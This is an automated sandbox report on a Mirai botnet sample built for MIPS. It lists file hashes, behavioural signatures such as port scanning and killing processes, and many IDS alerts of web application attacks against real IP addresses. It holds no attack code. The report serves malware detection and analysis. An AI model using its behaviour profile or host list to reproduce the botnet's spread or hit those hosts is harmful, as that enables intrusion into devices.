Create Interactive Tour

Linux Analysis Report
E6l0C6FObI.elf

Overview

General Information

Sample name:E6l0C6FObI.elf
renamed because original name is a hash value
Original sample name:e21f23ebe6bea02a2b38ed8b892fcc50.elf
Analysis ID:1391984
MD5:e21f23ebe6bea02a2b38ed8b892fcc50
SHA1:4982c3733fcd4a8315f0ca2c47d4d0a98e429dfa
SHA256:630cfde6992fd4c30f0a93ea553acf8b480cb93b7cf06f80bfa827ef384cee20
Tags:32elfmipsmirai
Infos:

Detection

Mirai
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sample tries to kill multiple processes (SIGKILL)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1391984
Start date and time:2024-02-14 09:27:33 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 7m 4s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:E6l0C6FObI.elf
renamed because original name is a hash value
Original Sample Name:e21f23ebe6bea02a2b38ed8b892fcc50.elf
Detection:MAL
Classification:mal92.spre.troj.linELF@0/0@2/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/E6l0C6FObI.elf
PID:5827
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Infected By Cult
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security
    Timestamp:192.168.2.1595.68.11.20059206802839471 02/14/24-09:30:11.643542
    SID:2839471
    Source Port:59206
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.166.212.5552944802839471 02/14/24-09:28:49.299902
    SID:2839471
    Source Port:52944
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.211.247.16432972802839471 02/14/24-09:29:38.517012
    SID:2839471
    Source Port:32972
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.100.7049146802839471 02/14/24-09:30:31.545066
    SID:2839471
    Source Port:49146
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.163.141.10035438802839471 02/14/24-09:29:19.037392
    SID:2839471
    Source Port:35438
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.167.244.20459956802839471 02/14/24-09:30:34.346873
    SID:2839471
    Source Port:59956
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.121.179.13460588802839471 02/14/24-09:30:29.619568
    SID:2839471
    Source Port:60588
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.253.21057328802839471 02/14/24-09:30:31.536430
    SID:2839471
    Source Port:57328
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.167.23.1745826802839471 02/14/24-09:30:43.761363
    SID:2839471
    Source Port:45826
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.221.105.18538792802839471 02/14/24-09:30:16.578437
    SID:2839471
    Source Port:38792
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.43.199.25060442802839471 02/14/24-09:29:13.571891
    SID:2839471
    Source Port:60442
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.185.22839508802839471 02/14/24-09:30:59.656689
    SID:2839471
    Source Port:39508
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.187.6148162802839471 02/14/24-09:29:35.282739
    SID:2839471
    Source Port:48162
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.110.224.25060494802839471 02/14/24-09:29:05.609109
    SID:2839471
    Source Port:60494
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.49.0.20857094802839471 02/14/24-09:29:08.989994
    SID:2839471
    Source Port:57094
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.85.242.20144192802839471 02/14/24-09:30:09.286325
    SID:2839471
    Source Port:44192
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.141.128.20050714802839471 02/14/24-09:29:05.664029
    SID:2839471
    Source Port:50714
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.86.78.14654268802839471 02/14/24-09:28:47.616648
    SID:2839471
    Source Port:54268
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.214.3556312802839471 02/14/24-09:30:21.588243
    SID:2839471
    Source Port:56312
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.212.252.12049512802839471 02/14/24-09:31:16.444367
    SID:2839471
    Source Port:49512
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.153.253.4558916802839471 02/14/24-09:29:08.781543
    SID:2839471
    Source Port:58916
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.244.58.8333966802839471 02/14/24-09:30:44.630447
    SID:2839471
    Source Port:33966
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.142.121.3434276802839471 02/14/24-09:30:11.623507
    SID:2839471
    Source Port:34276
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.220.84.18660332802839471 02/14/24-09:29:19.501376
    SID:2839471
    Source Port:60332
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.81.32.4139368802839471 02/14/24-09:30:52.951399
    SID:2839471
    Source Port:39368
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.83.36.6245420802839471 02/14/24-09:30:36.982645
    SID:2839471
    Source Port:45420
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.51.15049448802839471 02/14/24-09:29:56.731548
    SID:2839471
    Source Port:49448
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.45.120.18759888802839471 02/14/24-09:29:22.117430
    SID:2839471
    Source Port:59888
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.45.120.18759886802839471 02/14/24-09:29:22.114845
    SID:2839471
    Source Port:59886
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.74.103.11151472802839471 02/14/24-09:29:01.726292
    SID:2839471
    Source Port:51472
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.58.75.22149394802839471 02/14/24-09:29:19.100236
    SID:2839471
    Source Port:49394
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.174.163.10660954802839471 02/14/24-09:30:19.606172
    SID:2839471
    Source Port:60954
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.150.154.8943550802839471 02/14/24-09:29:40.557095
    SID:2839471
    Source Port:43550
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.79.128.16557886802839471 02/14/24-09:28:56.086124
    SID:2839471
    Source Port:57886
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.221.230.14442514802839471 02/14/24-09:30:08.380688
    SID:2839471
    Source Port:42514
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.181.231.22646230802839471 02/14/24-09:30:53.105817
    SID:2839471
    Source Port:46230
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.58.114.13949862802839471 02/14/24-09:30:24.552039
    SID:2839471
    Source Port:49862
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.141.36.14636812802839471 02/14/24-09:29:38.534025
    SID:2839471
    Source Port:36812
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.181.203.4443532802839471 02/14/24-09:29:08.750037
    SID:2839471
    Source Port:43532
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.42.29.20150536802839471 02/14/24-09:30:59.704800
    SID:2839471
    Source Port:50536
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.175.5938118802839471 02/14/24-09:30:33.984536
    SID:2839471
    Source Port:38118
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.216.129.12251042802839471 02/14/24-09:30:00.863592
    SID:2839471
    Source Port:51042
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.53.4955624802839471 02/14/24-09:28:57.744321
    SID:2839471
    Source Port:55624
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.14.8657698802839471 02/14/24-09:29:35.314523
    SID:2839471
    Source Port:57698
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.84.249.5746630802839471 02/14/24-09:30:37.298135
    SID:2839471
    Source Port:46630
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.211.60.13055122802839471 02/14/24-09:30:14.130736
    SID:2839471
    Source Port:55122
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.217.7.13544636802839471 02/14/24-09:30:59.698562
    SID:2839471
    Source Port:44636
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.198.147.17440722802839471 02/14/24-09:29:15.463004
    SID:2839471
    Source Port:40722
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.181.129.22056122802839471 02/14/24-09:30:19.657488
    SID:2839471
    Source Port:56122
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.215.140.734720802839471 02/14/24-09:30:52.968460
    SID:2839471
    Source Port:34720
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.186.20.3859798802839471 02/14/24-09:30:59.252997
    SID:2839471
    Source Port:59798
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.187.12.11156622802839471 02/14/24-09:31:20.467140
    SID:2839471
    Source Port:56622
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.16.15158734802839471 02/14/24-09:29:56.519559
    SID:2839471
    Source Port:58734
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.85.210.22436270802839471 02/14/24-09:30:48.374166
    SID:2839471
    Source Port:36270
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.111.218.6334790802839471 02/14/24-09:28:47.699644
    SID:2839471
    Source Port:34790
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.86.82.147552802839471 02/14/24-09:30:24.722511
    SID:2839471
    Source Port:47552
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.217.25.15034422802839471 02/14/24-09:29:42.750446
    SID:2839471
    Source Port:34422
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.165.98.5937194802839471 02/14/24-09:30:37.753827
    SID:2839471
    Source Port:37194
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.58.76.15736418802839471 02/14/24-09:28:47.692129
    SID:2839471
    Source Port:36418
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.142.19459116802839471 02/14/24-09:29:05.592924
    SID:2839471
    Source Port:59116
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.251.10742384802839471 02/14/24-09:29:09.708497
    SID:2839471
    Source Port:42384
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.245.13147714802839471 02/14/24-09:30:50.491498
    SID:2839471
    Source Port:47714
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.3.19146918802839471 02/14/24-09:29:24.633960
    SID:2839471
    Source Port:46918
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.158.244.2936510802839471 02/14/24-09:29:29.717200
    SID:2839471
    Source Port:36510
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.166.153.20150462802839471 02/14/24-09:29:29.687043
    SID:2839471
    Source Port:50462
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.127.183.25356418802839471 02/14/24-09:31:05.847533
    SID:2839471
    Source Port:56418
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.73.170.17547280802839471 02/14/24-09:28:55.841909
    SID:2839471
    Source Port:47280
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.164.62.16746354802839471 02/14/24-09:30:53.678962
    SID:2839471
    Source Port:46354
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.223.39.2933812802839471 02/14/24-09:28:47.093985
    SID:2839471
    Source Port:33812
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.74.18.10633192802839471 02/14/24-09:29:54.963770
    SID:2839471
    Source Port:33192
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.143.149.19359914802839471 02/14/24-09:29:57.053016
    SID:2839471
    Source Port:59914
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.185.157.9047802802839471 02/14/24-09:30:13.949038
    SID:2839471
    Source Port:47802
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.126.92.4752440802839471 02/14/24-09:31:12.841885
    SID:2839471
    Source Port:52440
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.222.35.15840938802839471 02/14/24-09:29:48.338599
    SID:2839471
    Source Port:40938
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.200.187.951780802839471 02/14/24-09:29:27.149485
    SID:2839471
    Source Port:51780
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.127.222.12157020802839471 02/14/24-09:29:40.613939
    SID:2839471
    Source Port:57020
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.134.64.16355098802839471 02/14/24-09:30:37.227998
    SID:2839471
    Source Port:55098
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.59.137.356688802839471 02/14/24-09:29:46.521625
    SID:2839471
    Source Port:56688
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.114.3251392802839471 02/14/24-09:29:05.609447
    SID:2839471
    Source Port:51392
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.168.78.359198802839471 02/14/24-09:30:23.896672
    SID:2839471
    Source Port:59198
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.186.20.3859690802839471 02/14/24-09:30:55.205815
    SID:2839471
    Source Port:59690
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.181.5339168802839471 02/14/24-09:29:54.450278
    SID:2839471
    Source Port:39168
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.141.251.24936532802839471 02/14/24-09:31:09.838797
    SID:2839471
    Source Port:36532
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.47.9135212802839471 02/14/24-09:29:24.641128
    SID:2839471
    Source Port:35212
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.171.68.22752590802839471 02/14/24-09:30:03.879540
    SID:2839471
    Source Port:52590
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.47.11.21053568802839471 02/14/24-09:29:03.983740
    SID:2839471
    Source Port:53568
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.255.93.9242718802839471 02/14/24-09:29:05.627978
    SID:2839471
    Source Port:42718
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.59.121.5345162802839471 02/14/24-09:29:40.401154
    SID:2839471
    Source Port:45162
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.7.114.10339656802839471 02/14/24-09:30:43.784052
    SID:2839471
    Source Port:39656
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.74.127.2247730802839471 02/14/24-09:29:00.314833
    SID:2839471
    Source Port:47730
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.218.158.21359270802839471 02/14/24-09:29:33.853105
    SID:2839471
    Source Port:59270
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.59.243.12938848802839471 02/14/24-09:30:48.161309
    SID:2839471
    Source Port:38848
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.190.3637162802839471 02/14/24-09:31:17.689597
    SID:2839471
    Source Port:37162
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.185.3740640802839471 02/14/24-09:29:15.504414
    SID:2839471
    Source Port:40640
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.6.2636432802839471 02/14/24-09:30:29.841357
    SID:2839471
    Source Port:36432
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.88.18635044802839471 02/14/24-09:30:43.733535
    SID:2839471
    Source Port:35044
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.99.168.21236206802839471 02/14/24-09:30:31.339860
    SID:2839471
    Source Port:36206
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.135.219.6851420802839471 02/14/24-09:29:00.287610
    SID:2839471
    Source Port:51420
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.179.11447876802839471 02/14/24-09:30:48.091961
    SID:2839471
    Source Port:47876
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.25.57.4354646802839471 02/14/24-09:31:02.778009
    SID:2839471
    Source Port:54646
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.127.24942706802839471 02/14/24-09:29:57.507595
    SID:2839471
    Source Port:42706
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.184.60.5138690802839471 02/14/24-09:29:03.705439
    SID:2839471
    Source Port:38690
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.58.54.9239562802839471 02/14/24-09:30:24.760817
    SID:2839471
    Source Port:39562
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.149.14956100802839471 02/14/24-09:30:37.193296
    SID:2839471
    Source Port:56100
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.128.42.20250708802839471 02/14/24-09:30:06.424087
    SID:2839471
    Source Port:50708
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.164.22.1036698802839471 02/14/24-09:30:59.771528
    SID:2839471
    Source Port:36698
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.164.1.12654004802839471 02/14/24-09:30:11.615893
    SID:2839471
    Source Port:54004
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.70.2356420802839471 02/14/24-09:31:13.059367
    SID:2839471
    Source Port:56420
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.86.102.4056872802839471 02/14/24-09:30:14.786063
    SID:2839471
    Source Port:56872
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.240.204.19436554802839471 02/14/24-09:31:13.069495
    SID:2839471
    Source Port:36554
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.18.10151720802839471 02/14/24-09:29:56.523011
    SID:2839471
    Source Port:51720
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.57.101.21447620802839471 02/14/24-09:30:48.588020
    SID:2839471
    Source Port:47620
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.28.177.6441816802839471 02/14/24-09:30:16.641450
    SID:2839471
    Source Port:41816
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.181.228.16439936802839471 02/14/24-09:30:06.794584
    SID:2839471
    Source Port:39936
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.111.232.9350378802839471 02/14/24-09:29:33.432165
    SID:2839471
    Source Port:50378
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.189.2548516802839471 02/14/24-09:29:51.661319
    SID:2839471
    Source Port:48516
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.217.150.10844132802839471 02/14/24-09:29:56.522497
    SID:2839471
    Source Port:44132
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.19.6344014802839471 02/14/24-09:29:56.521559
    SID:2839471
    Source Port:44014
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.123.18251872802839471 02/14/24-09:29:56.764313
    SID:2839471
    Source Port:51872
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.221.226.6455164802839471 02/14/24-09:30:00.960733
    SID:2839471
    Source Port:55164
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.53.4955572802839471 02/14/24-09:28:56.050828
    SID:2839471
    Source Port:55572
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.84.219.10350440802839471 02/14/24-09:30:19.190524
    SID:2839471
    Source Port:50440
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.213.32.23832960802839471 02/14/24-09:30:08.906175
    SID:2839471
    Source Port:32960
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.204.25436962802839471 02/14/24-09:29:19.025452
    SID:2839471
    Source Port:36962
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.59.106.19255242802839471 02/14/24-09:30:34.062554
    SID:2839471
    Source Port:55242
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.241.1259074802839471 02/14/24-09:30:14.533215
    SID:2839471
    Source Port:59074
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.99.36.11951556802839471 02/14/24-09:30:06.226730
    SID:2839471
    Source Port:51556
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.217.161.16951832802839471 02/14/24-09:30:24.692627
    SID:2839471
    Source Port:51832
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.99.97.11639818802839471 02/14/24-09:30:19.609726
    SID:2839471
    Source Port:39818
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.159.70.23836342802839471 02/14/24-09:29:22.049211
    SID:2839471
    Source Port:36342
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.12.95.4536480802839471 02/14/24-09:29:31.793267
    SID:2839471
    Source Port:36480
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.132.215.15345590802839471 02/14/24-09:29:48.351282
    SID:2839471
    Source Port:45590
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.237.209.8143078802839471 02/14/24-09:31:06.734740
    SID:2839471
    Source Port:43078
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.83.127.15438446802839471 02/14/24-09:31:13.699113
    SID:2839471
    Source Port:38446
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.56.57.21048484802839471 02/14/24-09:29:33.513112
    SID:2839471
    Source Port:48484
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.212.8.1259908802839471 02/14/24-09:31:16.432632
    SID:2839471
    Source Port:59908
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.78.1.5734772802839471 02/14/24-09:29:01.019005
    SID:2839471
    Source Port:34772
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.116.4852464802839471 02/14/24-09:29:08.916682
    SID:2839471
    Source Port:52464
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.200.9745228802839471 02/14/24-09:29:51.448153
    SID:2839471
    Source Port:45228
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.169.120.24251906802839471 02/14/24-09:28:49.299837
    SID:2839471
    Source Port:51906
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.168.163.8042402802839471 02/14/24-09:30:10.668281
    SID:2839471
    Source Port:42402
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.205.644980802839471 02/14/24-09:30:52.970267
    SID:2839471
    Source Port:44980
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.217.237.3641208802839471 02/14/24-09:30:44.640108
    SID:2839471
    Source Port:41208
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.74.32.15542252802839471 02/14/24-09:29:22.833929
    SID:2839471
    Source Port:42252
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.110.177.15035120802839471 02/14/24-09:30:11.637297
    SID:2839471
    Source Port:35120
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.217.203.25134672802839471 02/14/24-09:29:56.523072
    SID:2839471
    Source Port:34672
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.180.15.8435190802839471 02/14/24-09:28:47.080473
    SID:2839471
    Source Port:35190
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
